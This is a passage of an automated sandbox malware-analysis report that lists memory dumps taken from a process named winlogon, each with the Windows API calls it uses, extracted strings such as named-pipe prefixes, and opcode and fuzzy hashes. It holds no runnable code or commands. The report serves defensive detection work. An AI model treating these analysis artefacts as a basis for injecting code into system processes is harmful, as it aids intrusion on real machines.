                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction ID: 6067695c91f6c725ff6508a8110375a362891e2ec0ade76fc3a726de7d17ef3a
                                                                      • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                                      • Instruction Fuzzy Hash: 10110336721B44CAEB00CB60E8593AC73A4FB19768F840A22EE6E867A4DF78C1548740
                                                                      APIs
                                                                        • Part of subcall function 000001E8589EE22C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,000001E8589EE578), ref: 000001E8589EE256
                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,000001E8589EE6A9), ref: 000001E8589EE95B
                                                                      • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,000001E8589EE6A9), ref: 000001E8589EE99F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CodeInfoPageValid
                                                                      • String ID: !-M
                                                                      • API String ID: 546120528-3625753649
                                                                      • Opcode ID: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
                                                                      • Instruction ID: fbb97a023ca7a27056f9652c3de7910e2d6e6da190b104cd427da1fd2decefbf
                                                                      • Opcode Fuzzy Hash: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
                                                                      • Instruction Fuzzy Hash: EA8179726246C0C7E7768F26E4542ADFAA1FB44780F58813FDECE47691EE39D5618301
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction ID: 909c7db89837289c91e21428672992ba1c8be71d2c4bebd0607d515601003b91
                                                                      • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction Fuzzy Hash: 03717A32228BC28AEB349A66D9543EEF794FB84B85F500037DD4E57B89DE35C6018700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction ID: e0e27b66e429965663d3b8188410bc82624911b767b8f40b8b78e93eddec74f8
                                                                      • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction Fuzzy Hash: CD717A32224BC2C6EB799E66D9943EEFA94FB84B84F540037ED4E47B89DE75C6108700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction ID: 8fac1a8813667edd01fca4bf786c4c2de05496bec2e0e38077a0113f49fd39e7
                                                                      • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                                      • Instruction Fuzzy Hash: 0D717C36224BC286EB749EA6D9943EEF795FB85B84F540037DD0E87B89DE35C6008B40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 3242871069-1018135373
                                                                      • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction ID: 6a60bd09209a52f2539964aa68956d53568ae7179e18bce2abfa12d4f8870aa5
                                                                      • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                      • Instruction Fuzzy Hash: B851A032331A80CAEB54CB16E445BEEB791EF44B9AF558536AE4E67788DF78C841C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction ID: 4c10b93590c364fe44ce2a6181efee628e5bd5224802c6c0238042b1dd9b6601
                                                                      • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                      • Instruction Fuzzy Hash: 3B615632528BC4C6EB619B15E4407DEB7A0FB85B89F044226EF9D17B9ACF78C190CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction ID: 492e690b5fc0ba630569ef646d4e0cfcee60a2f75997ce79f0101205b737b0a1
                                                                      • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction Fuzzy Hash: 6951AD362287C1CDEA249A65E4943EEFB92FF84B82F440037DD5D43B99DE3AD4058744
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction ID: b8a386359cbd7ed49b2b453e79f29644d783837d8ad6ce2b090bb6cfea9ca7bf
                                                                      • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction Fuzzy Hash: 5051B2362247C1C6EA259E65E4943EEFB92FB98B80F440137ED5D43B89DE3AD524C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction ID: 6318a54d2b66f9efaecb8df6c52ce76569b66b11cde0a45df1b4d16293cb8c24
                                                                      • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                                      • Instruction Fuzzy Hash: 1151C0362287C2CAEA649E6AE4543EEF792FB94B80F540037DE5D43B89DE39D404CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID: $ !-M
                                                                      • API String ID: 1807457897-1849103749
                                                                      • Opcode ID: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
                                                                      • Instruction ID: 346d9ff4f4db9e371fd79dc0f46c3b961909a2f0264f4cc290ba0f25192b229b
                                                                      • Opcode Fuzzy Hash: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
                                                                      • Instruction Fuzzy Hash: 66517B726286C0CBE7218F25E0843DEBBA0F749748F64422BEACD47A85DF78C565CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction ID: bb84fa12f88460f761866de61734aaedcb91246f2b6b8624b4e3301918a03819
                                                                      • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction Fuzzy Hash: 2441AE72625A80CAEB609F65E4447DEFBA5FB88784F804132EE4D87758EF39C441CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction ID: 58dd64383b29cb34c4e197e50f512c8b2068d31f863029e08f951eb50e9250b4
                                                                      • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                                      • Instruction Fuzzy Hash: 2741AE72625A80C6EB209F65E8447DEF7A2FB88784F804132EE4D87758EF38C441CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: !-M
                                                                      • API String ID: 442123175-3625753649
                                                                      • Opcode ID: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
                                                                      • Instruction ID: cb3e498f02afde4d42e4f75e6eca5d6d130e2b4fee760a12fe279dbe9165c968
                                                                      • Opcode Fuzzy Hash: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
                                                                      • Instruction Fuzzy Hash: 77317872621A80CAEB659F29E8843CDF3A0FB58784F944032EE8D87754EF38C551CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: !-M
                                                                      • API String ID: 442123175-3625753649
                                                                      • Opcode ID: 2b49dc1147f62743d5f71a8e2f42af263b7a37484780a08d876dda563020fbab
                                                                      • Instruction ID: a092438e22dac429953ebf923f65492620b9caa79ea66b73cebbfaf07635e6b5
                                                                      • Opcode Fuzzy Hash: 2b49dc1147f62743d5f71a8e2f42af263b7a37484780a08d876dda563020fbab
                                                                      • Instruction Fuzzy Hash: CD319F72224A80CAEB159F25E4843CDF7A0FB58784F844032EE4E87755DF38C555CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastModuleName
                                                                      • String ID: !-M
                                                                      • API String ID: 2776309574-3625753649
                                                                      • Opcode ID: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
                                                                      • Instruction ID: 0877bf78c1458f2c1db12822aa1d5ce982476afaf02ea8560513a900ca33586e
                                                                      • Opcode Fuzzy Hash: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
                                                                      • Instruction Fuzzy Hash: CA316B32228BC0CBE7618B25E4443DEBBA4FB89795F540126DACD47BA8DF38C550CB41
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction ID: 8e57883d678877deaf96a3c60fdd68ab16596737b83dceb692cddac051c20a70
                                                                      • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction Fuzzy Hash: 7C11FB32228B80C6EB618B15F44439DB7E5FB88B94F584225EE8D07B64EF3DC551CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction ID: 39ef4274deee12ef7542864adfbf82197b388cece3bd9ae8090adda0d5c27b6f
                                                                      • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction Fuzzy Hash: FB11FB36224B80C2EB658B15F44429DBBE5FB88B94F584225EE8D07B64EF7CC561CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction ID: 6504c3570675247b7c278e0ad6195a10b38ca5f4628e3c9ff3024be3bc0f689c
                                                                      • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                                      • Instruction Fuzzy Hash: AF110D32229B81C2EB618F15F44429EB7E5FB88B94F584226EE8D07B64DF3CC551CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction ID: a1a03c553d0de311f7bf062a3fd0df36befeb04505d542d6e641286c580bfaa3
                                                                      • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                                      • Instruction Fuzzy Hash: 21113C21625BC0C6EB14DB66E80829DB7A0FB88FD1F594125DE4E57765DF39D4428300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
